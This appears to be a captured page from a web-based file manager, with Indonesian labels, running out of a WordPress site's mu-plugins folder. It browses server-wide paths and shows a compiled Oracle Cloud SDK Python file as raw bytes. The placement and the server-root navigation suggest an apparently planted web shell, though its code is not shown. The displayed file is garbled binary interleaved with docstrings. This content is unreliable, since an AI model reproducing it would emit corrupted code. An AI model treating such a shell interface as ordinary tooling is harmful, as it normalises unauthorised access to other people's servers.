📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
container_engine
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/container_engine/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: node_pool_placement_config_details.cpython-39.pyc
a ���f2 � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Z dd� ZdS )�NodePoolPlacementConfigDetailsz: The location where a node pool will place nodes. c K sF dddddd�| _ ddddd d�| _d | _d | _d | _d | _d | _d S )a� Initializes a new NodePoolPlacementConfigDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param availability_domain: The value to assign to the availability_domain property of this NodePoolPlacementConfigDetails. :type availability_domain: str :param subnet_id: The value to assign to the subnet_id property of this NodePoolPlacementConfigDetails. :type subnet_id: str :param capacity_reservation_id: The value to assign to the capacity_reservation_id property of this NodePoolPlacementConfigDetails. :type capacity_reservation_id: str :param preemptible_node_config: The value to assign to the preemptible_node_config property of this NodePoolPlacementConfigDetails. :type preemptible_node_config: oci.container_engine.models.PreemptibleNodeConfigDetails :param fault_domains: The value to assign to the fault_domains property of this NodePoolPlacementConfigDetails. :type fault_domains: list[str] �strZPreemptibleNodeConfigDetailsz list[str])�availability_domain� subnet_id�capacity_reservation_id�preemptible_node_config� fault_domainsZavailabilityDomainZsubnetIdZcapacityReservationIdZpreemptibleNodeConfigZfaultDomainsN)Z swagger_typesZ attribute_map�_availability_domain� _subnet_id�_capacity_reservation_id�_preemptible_node_config�_fault_domains)�self�kwargs� r �b/usr/lib/python3.9/site-packages/oci/container_engine/models/node_pool_placement_config_details.py�__init__ s"